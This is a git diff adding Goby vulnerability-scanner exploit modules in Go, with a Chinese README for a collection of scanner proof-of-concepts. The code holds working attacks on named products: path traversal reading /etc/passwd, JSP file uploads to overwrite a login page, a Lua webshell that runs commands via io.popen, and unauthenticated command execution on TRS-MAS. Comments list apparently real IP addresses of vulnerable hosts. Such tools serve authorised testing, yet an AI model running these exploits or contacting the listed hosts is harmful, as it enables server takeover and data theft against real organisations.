diff --git a/lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt b/lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt new file mode 100644 index 000000000..7e9cb3150 --- /dev/null +++ b/lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt @@ -0,0 +1,136 @@ +package exploits + +import ( + "git.gobies.org/goby/goscanner/goutils" +) + +func init() { + expJson := `{ + "Name": "AceNet AceReporter Report component Arbitrary file download", + "Description": "All firewall devices that use the AceNet AceReporter report component can download arbitrary files", + "Product": "AceNet AceReporter Report component", + "Homepage": "", + "DisclosureDate": "2021-08-04", + "Author": "luckying1314@139.com", + "GobyQuery": "title=\"Login @ Reporter\" || title=\"Technology, Inc.\"", + "Level": "2", + "Impact": "

The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory (..\\ or../) to download or read a file beyond the original specified path.The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system.

", + "Recommandation": "

Limit ../ symbol is used to determine the input path when the file is downloaded. The best method is that the file should be one to one in the database, and avoid entering the absolute path to obtain the file

", + "References": [ + "https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972" + ], + "HasExp": true, + "ExpParams": [ + { + "name": "path", + "type": "createSelect", + "value": "../../../../../../../../../etc/passwd,../../../../../../../../../etc/hosts", + "show": "" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename=data.txt", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "root", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "daemon", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "GET", + "uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/hosts&savename=data.txt", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "127.0.0.1", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/view/action/download_file.php?filename={{{path}}}&savename=data.txt", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "SetVariable": [ + "output|lastbody" + ] + } + ], + "Tags": [ + "file download" + ], + "CVEIDs": null, + "CVSSScore": "0.0", + "AttackSurfaces": { + "Application": null, + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + nil, + nil, + )) +} diff --git a/lib/goby/goby_pocs/CNPOWER OA Arbitrary File Upload Vulnerability.txt b/lib/goby/goby_pocs/CNPOWER OA Arbitrary File Upload Vulnerability.txt new file mode 100644 index 000000000..7263c2f82 --- /dev/null +++ b/lib/goby/goby_pocs/CNPOWER OA Arbitrary File Upload Vulnerability.txt @@ -0,0 +1,251 @@ +package exploits + +import ( + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "regexp" + "strings" +) + +func init() { + expJson := `{ + "Name": "CNPOWER OA Arbitrary File Upload Vulnerability", + "Description": "

Huatian power collaborative office system combines advanced management ideas, management modes, software technology and network technology to provide users with a low-cost and efficient collaborative office and management platform. Wise managers have achieved good results in strengthening standardized workflow, strengthening team execution, promoting fine management and promoting business growth through the use of Huatian power collaborative office platform.

There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "Product": "CNPOWER-OA", + "Homepage": "http://www.oa8000.com/", + "DisclosureDate": "2022-07-22", + "Author": "toto", + "FofaQuery": "body=\"/OAapp/WebObjects/OAapp.woa\" || body=\"/OAapp/htpages/app\"", + "GobyQuery": "body=\"/OAapp/WebObjects/OAapp.woa\" || body=\"/OAapp/htpages/app\"", + "Level": "2", + "Impact": "

There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "Recommendation": "

The manufacturer has not provided a vulnerability repair plan. Please pay attention to the update of the manufacturer's homepage:

http://www.oa8000.com/

", + "References": [ + "http://www.oa8000.com" + ], + "Is0day": false, + "HasExp": true, + "ExpParams": [ + { + "name": "fileContent", + "type": "input", + "value": "<%out.println(\"123\");%>", + "show": "" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "OR", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "Tags": [ + "File Upload" + ], + "VulType": [ + "File Upload" + ], + "CVEIDs": [ + "" + ], + "CNNVD": [ + "" + ], + "CNVD": [ + "" + ], + "CVSSScore": "9.8", + "Translation": { + "CN": { + "Name": "华天动力 OA 任意文件上传漏洞", + "Product": "华天动力-OA", + "Description": "

华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。

华天动力 OA 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。

", + "Recommendation": "

目前官方尚未发布安全补丁,请关注厂商更新。http://www.oa8000.com/

", + "Impact": "

华天动力 OA 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。

", + "VulType": [ + "⽂件上传" + ], + "Tags": [ + "⽂件上传" + ] + }, + "EN": { + "Name": "CNPOWER OA Arbitrary File Upload Vulnerability", + "Product": "CNPOWER-OA", + "Description": "

Huatian power collaborative office system combines advanced management ideas, management modes, software technology and network technology to provide users with a low-cost and efficient collaborative office and management platform. Wise managers have achieved good results in strengthening standardized workflow, strengthening team execution, promoting fine management and promoting business growth through the use of Huatian power collaborative office platform.

There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "Recommendation": "

The manufacturer has not provided a vulnerability repair plan. Please pay attention to the update of the manufacturer's homepage:

http://www.oa8000.com/

", + "Impact": "

There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "VulType": [ + "File Upload" + ], + "Tags": [ + "File Upload" + ] + } + }, + "AttackSurfaces": { + "Application": null, + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + getOAFilePath98234u293 := func(host *httpclient.FixUrl) string { + requestConfig := httpclient.NewPostRequestConfig("/OAapp/jsp/upload.jsp") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundary5Ur8laykKAWws2QO") + requestConfig.Data = "------WebKitFormBoundary5Ur8laykKAWws2QO\r\nContent-Disposition: form-data; name=\"file\"; filename=\"xxx.xml\"\r\nContent-Type: image/png\r\n\r\nreal path\r\n------WebKitFormBoundary5Ur8laykKAWws2QO\r\nContent-Disposition: form-data; name=\"filename\"\r\n\r\nxxx.png\r\n------WebKitFormBoundary5Ur8laykKAWws2QO--\r\n" + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, ".dat") { + if path := regexp.MustCompile(`(.*?)Tomcat/webapps/.*?\.dat`).FindStringSubmatch(resp.RawBody); len(path) > 1 { + // 直接返回文件最后一个 jsessionid + return path[1] + } else if path := regexp.MustCompile(`(.*?)htoadata/appdata/.*?\.dat`).FindStringSubmatch(resp.RawBody); len(path) > 1 { + return path[1] + } + } + } + + return "" + } + + exploitUploadFile837276342783 := func(path string, fileContent string, host *httpclient.FixUrl) bool { + + requestConfig := httpclient.NewPostRequestConfig("/OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryzRSYXfFlXqk6btQm") + requestConfig.Data = "------WebKitFormBoundaryzRSYXfFlXqk6btQm\r\nContent-Disposition: form-data; name=\"EDITFILE\"; filename=\"xxx.txt\"\r\nContent-Type: image/png\r\n\r\n" + fileContent + "\r\n------WebKitFormBoundaryzRSYXfFlXqk6btQm\r\nContent-Disposition: form-data; name=\"newFileName\"\r\n\r\n" + path + "Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp\r\n------WebKitFormBoundaryzRSYXfFlXqk6btQm--\r\n" + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + return resp.StatusCode == 200 + } + + return false + } + + checkUploadedFile2398764278 := func(fileContent string, host *httpclient.FixUrl) bool { + requestConfig := httpclient.NewGetRequestConfig("/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + return resp.StatusCode == 200 && strings.Contains(resp.RawBody, fileContent) + } + + return false + } + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + + path := getOAFilePath98234u293(u) + if path == "" { + path = "D:/htoa/" + } + + rand := goutils.RandomHexString(6) + + if exploitUploadFile837276342783(path, "<%out.print(\""+rand+"\");%>", u) { + return checkUploadedFile2398764278(rand, u) + + } + + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + + fileContent := ss.Params["fileContent"].(string) + + path := getOAFilePath98234u293(expResult.HostInfo) + if path == "" { + path = "D:/htoa/" + } + + if exploitUploadFile837276342783(path, fileContent, expResult.HostInfo) { + expResult.Success = true + expResult.Output = "文件已上传,请访问:/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp" + } + + return expResult + }, + )) +} + +// http://36.133.113.253:8081 +// http://221.229.120.251:800/ +// http://winnertoke.com:6001/ \ No newline at end of file diff --git a/lib/goby/goby_pocs/H3C CVM Arbitrary File Upload Vulnerability.txt b/lib/goby/goby_pocs/H3C CVM Arbitrary File Upload Vulnerability.txt new file mode 100644 index 000000000..968e04479 --- /dev/null +++ b/lib/goby/goby_pocs/H3C CVM Arbitrary File Upload Vulnerability.txt @@ -0,0 +1,232 @@ +package exploits + +import ( + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "strings" +) + +func init() { + expJson := `{ + "Name": "H3C CVM Arbitrary File Upload Vulnerability", + "Description": "

H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.

H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "Product": "H3C-CVM", + "Homepage": "http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/", + "DisclosureDate": "2022-05-25", + "Author": "su18@javaweb.org", + "FofaQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")", + "GobyQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")", + "Level": "3", + "Impact": "

H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "Recommendation": "

At present, the official has not released a security patch, please pay attention to the manufacturer's update.http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/

", + "References": [ + "https://fofa.so/" + ], + "Is0day": false, + "HasExp": true, + "ExpParams": [ + { + "name": "fileName", + "type": "input", + "value": "evil", + "show": "" + }, + { + "name": "fileContent", + "type": "input", + "value": "<%out.println(\"123\");%>", + "show": "" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "Tags": [ + "Arbitrary File Creation" + ], + "VulType": [ + "Arbitrary File Creation" + ], + "CVEIDs": [ + "" + ], + "CNNVD": [ + "" + ], + "CNVD": [ + "" + ], + "CVSSScore": "8.0", + "Translation": { + "CN": { + "Name": "H3C CVM 前台任意文件上传漏洞", + "Product": "H3C-CVM", + "Description": "

H3C 公司依托其强大的技术实力、 产品与服务优势, 以及深入人心的以客户为中心的理念, 为企业数据中心 IaaS 云计算基础架构 提供最优化的虚拟化与云业务运营解决方案。 通过 H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制, 以 简洁的管理界面, 统一管理数据中心内所有的物理资源和虚拟资源, 不仅能提高管理员的管控能力、 简化日常例行工作, 更可降低 IT 环境的复杂度和管理成本。

H3C CVM 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。

", + "Recommendation": "

目前官方尚未发布安全补丁,请关注厂商更新。http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/

", + "Impact": "

H3C CVM 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。

", + "VulType": [ + "⽂件上传" + ], + "Tags": [ + "⽂件上传" + ] + }, + "EN": { + "Name": "H3C CVM Arbitrary File Upload Vulnerability", + "Product": "H3C-CVM", + "Description": "

H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.

H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "Recommendation": "

At present, the official has not released a security patch, please pay attention to the manufacturer's update.http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/

", + "Impact": "

H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "VulType": [ + "Arbitrary File Creation" + ], + "Tags": [ + "Arbitrary File Creation" + ] + } + }, + "AttackSurfaces": { + "Application": null, + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + exploitUploadFile2398429842 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { + + // 上传文件 + requestConfig := httpclient.NewPostRequestConfig("/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/" + fileName + ".jsp&name=222") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Header.Store("Content-range", "bytes 0-10/20") + requestConfig.Header.Store("Referer", "http://"+host.HostInfo+"/cas/login") + requestConfig.Data = fileContent + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "\"success\\\":true") { + return true + } + } + + return false + } + + checkUploadFile12312313810923 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { + + requestConfig := httpclient.NewGetRequestConfig("/" + fileName) + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) + } + + return false + } + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + + rand := goutils.RandomHexString(6) + rand2 := goutils.RandomHexString(6) + + if exploitUploadFile2398429842(rand2, "<%out.print(\""+rand+"\");%>", u) { + return checkUploadFile12312313810923("/cas/js/lib/buttons/"+rand2+".jsp", rand, u) + } + + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + + fileContent := ss.Params["fileContent"].(string) + fileName := ss.Params["fileName"].(string) + + if exploitUploadFile2398429842(fileName, fileContent, expResult.HostInfo) { + + expResult.Success = true + expResult.Output = "文件上传已成功,请检查路径:/cas/js/lib/buttons/" + fileName + ".jsp" + } + + return expResult + }, + )) +} + +// http://183.63.173.141:8080/ +// https://60.190.202.42:8443/ +// http://61.53.232.5:28080/ \ No newline at end of file diff --git a/lib/goby/goby_pocs/QiAnXin_Tianqing_terminal_security_management_system_client_upload_file.json_getshell.txt b/lib/goby/goby_pocs/QiAnXin_Tianqing_terminal_security_management_system_client_upload_file.json_getshell.txt new file mode 100644 index 000000000..4298eeb9d --- /dev/null +++ b/lib/goby/goby_pocs/QiAnXin_Tianqing_terminal_security_management_system_client_upload_file.json_getshell.txt @@ -0,0 +1,128 @@ +package exploits + +import ( + "fmt" + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "strings" +) + +func init() { + expJson := `{ + "Name": "QiAnXin Tianqing terminal security management system client_upload_file.json getshell", + "Description": "There is an arbitrary file upload vulnerability in QiAnXin Tianqing terminal security management system, and the attacker can upload his own webshell to control the server.", + "Product": "360-TianQing", + "Homepage": "https://www.qianxin.com/product/detail/pid/49", + "DisclosureDate": "2021-04-09", + "Author": "itardc@163.com", + "FofaQuery": "app=\"360-TianQing\"", + "GobyQuery": "app=\"360-TianQing\"", + "Level": "3", + "Impact": "", + "Recommendation": "", + "References": [ + "http://fofa.so" + ], + "HasExp": true, + "ExpParams": [ + { + "name": "cmd", + "type": "input", + "value": "whoami" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "data": "", + "data_type": "text", + "follow_redirect": true, + "method": "GET", + "uri": "/" + }, + "ResponseTest": { + "checks": [ + { + "bz": "", + "operation": "==", + "type": "item", + "value": "200", + "variable": "$code" + } + ], + "operation": "AND", + "type": "group" + } + } + ], + "ExploitSteps": null, + "Tags": ["getshell"], + "CVEIDs": null, + "CVSSScore": "0.0", + "AttackSurfaces": { + "Application": ["360-TianQing"], + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + randomFilename := goutils.RandomHexString(4) + cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=3cb95cfbe1035bce8c448fcaf80fe7d9&filename=../../lua/%s.LUAC", randomFilename)) + cfg.VerifyTls = false + cfg.FollowRedirect = false + cfg.Header.Store("Referer", u.FixedHostInfo) + cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B") + cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ") + cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n" + cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n" + cfg.Data += "Content-Type: application/xxxx\r\n\r\n" + cfg.Data += "hello,world\r\n" + cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--" + if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil && resp.StatusCode == 200 { + return strings.Contains(resp.Utf8Html, "\"status\":true") && + strings.Contains(resp.Utf8Html, "upload file success") + } + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + randomFilename := goutils.RandomHexString(4) + cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/%s.LUAC", randomFilename)) + //cfg := httpclient.NewPostRequestConfig("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/sky.LUAC") + cfg.VerifyTls = false + cfg.FollowRedirect = false + cfg.Header.Store("Referer", expResult.HostInfo.FixedHostInfo) + cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B") + cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ") + cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n" + cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n" + cfg.Data += "Content-Type: application/xxxx\r\n\r\n" + cfg.Data += "if ngx.req.get_uri_args().cmd then\r\n" + cfg.Data += "cmd = ngx.req.get_uri_args().cmd\r\n" + cfg.Data += "local t = io.popen(cmd)\r\n" + cfg.Data += "local a = t:read(\"*all\")\r\n" + cfg.Data += "ngx.say(a)\r\n" + cfg.Data += "end\r\n" + cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--" + httpclient.DoHttpRequest(expResult.HostInfo, cfg) + cmd := ss.Params["cmd"].(string) + if resp, err := httpclient.SimpleGet(expResult.HostInfo.FixedHostInfo + fmt.Sprintf("/api/%s.json?cmd=%s", randomFilename, cmd)); err == nil && resp.StatusCode == 200 { + expResult.Success = true + expResult.Output = resp.Utf8Html + } + return expResult + }, + )) +} diff --git a/lib/goby/goby_pocs/README.md b/lib/goby/goby_pocs/README.md new file mode 100644 index 000000000..50f279559 --- /dev/null +++ b/lib/goby/goby_pocs/README.md @@ -0,0 +1,15 @@ +# goby-poc +# 声明 +包含447个自定义goby-poc,是否含有后门和重复自行判断,如果无红队版,可直接poc管理处导入自定义poc即可,共计745个。 +![图片](https://user-images.githubusercontent.com/74171727/185719401-f4782b47-157b-48db-87df-955a65adc487.png) + + +本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。 + +Goby POC 仅仅只供对已授权的目标使用测试,对未授权目标的测试,本库不承担责任,均由使用者自行承担。 + + +## ✦✦Star上升曲线✦✦ + +[![Stargazers over time](https://starchart.cc/MY0723/goby-poc.svg)](https://starchart.cc/MY0723/goby-poc) + diff --git a/lib/goby/goby_pocs/TRS-MAS testCommandExecutor.jsp Remote Command Execution.txt b/lib/goby/goby_pocs/TRS-MAS testCommandExecutor.jsp Remote Command Execution.txt new file mode 100644 index 000000000..4f06f27c2 --- /dev/null +++ b/lib/goby/goby_pocs/TRS-MAS testCommandExecutor.jsp Remote Command Execution.txt @@ -0,0 +1,164 @@ +package exploits + +import ( + "git.gobies.org/goby/goscanner/goutils" +) + +func init() { + expJson := `{ + "Name": "TRS-MAS testCommandExecutor.jsp Remote Command Execution", + "Description": "

TRS MAS is a set of universal media asset management system launched by Beijing Tors Information Technology Co., Ltd. based on the characteristics of audio and video use in the mobile Internet era. The same audio and video resources can be used for different terminal platforms, effectively saving costs. , to simplify the operation. 

There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.

", + "Product": "TRS-MAS", + "Homepage": "http://www.trs.com.cn/", + "DisclosureDate": "2022-04-28", + "Author": "liubye", + "FofaQuery": "header=\"X-Mas-Server\" || banner=\"X-Mas-Server\"", + "GobyQuery": "header=\"X-Mas-Server\" || banner=\"X-Mas-Server\"", + "Level": "3", + "Impact": "

There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.

", + "Recommendation": "

At present, the version affected by the vulnerability has been officially stopped updating. It is recommended to use defense devices for protection.Disable /sysinfo/testCommandExecutor.jsp path access.

", + "References": [ + "https://cn-sec.com/archives/966820.html" + ], + "Is0day": false, + "HasExp": true, + "ExpParams": [ + { + "name": "cmdLine", + "type": "input", + "value": "whoami", + "show": "" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/mas/sysinfo/testCommandExecutor.jsp", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "测试命令行进程执行", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/mas/sysinfo/testCommandExecutor.jsp?cmdLine={{{cmdLine}}}&workDir=&pathEnv=&libPathEnv=", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "测试命令行进程执行", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "Tags": [ + "Command Execution" + ], + "VulType": [ + "Command Execution" + ], + "CVEIDs": [ + "" + ], + "CNNVD": [ + "" + ], + "CNVD": [ + "" + ], + "CVSSScore": "9.7", + "Translation": { + "CN": { + "Name": "TRS-MAS 测试文件 testCommandExecutor.jsp 远程命令执行", + "Product": "拓尔思-MAS", + "Description": "

TRS MAS是基于移动互联网时代音视频的使用特点,北京拓尔思信息技术股份有限公司推出的一套通用型媒资管理系统,同一个音视频资源能面向不同的终端平台提供使用,有效节省成本,简化操作。

TRS MAS v5、v6版本存在未授权命令执行漏洞,攻击者可以在未授权情况下在服务器上执行任意命令,获取服务器操作权限。

", + "Recommendation": "

目前受漏洞影响的版本官方已停止更新,建议使用防御设备进行防护,禁止对 /sysinfo/testCommandExecutor.jsp 路径的访问。

", + "Impact": "

TRS MAS v5、v6版本存在未授权命令执行漏洞,攻击者可以在未授权情况下在服务器上执行任意命令,获取服务器操作权限。

", + "VulType": [ + "命令执⾏" + ], + "Tags": [ + "命令执⾏" + ] + }, + "EN": { + "Name": "TRS-MAS testCommandExecutor.jsp Remote Command Execution", + "Product": "TRS-MAS", + "Description": "

TRS MAS is a set of universal media asset management system launched by Beijing Tors Information Technology Co., Ltd. based on the characteristics of audio and video use in the mobile Internet era. The same audio and video resources can be used for different terminal platforms, effectively saving costs. , to simplify the operation. 

There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.

", + "Recommendation": "

At present, the version affected by the vulnerability has been officially stopped updating. It is recommended to use defense devices for protection.Disable /sysinfo/testCommandExecutor.jsp path access.

", + "Impact": "

There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.

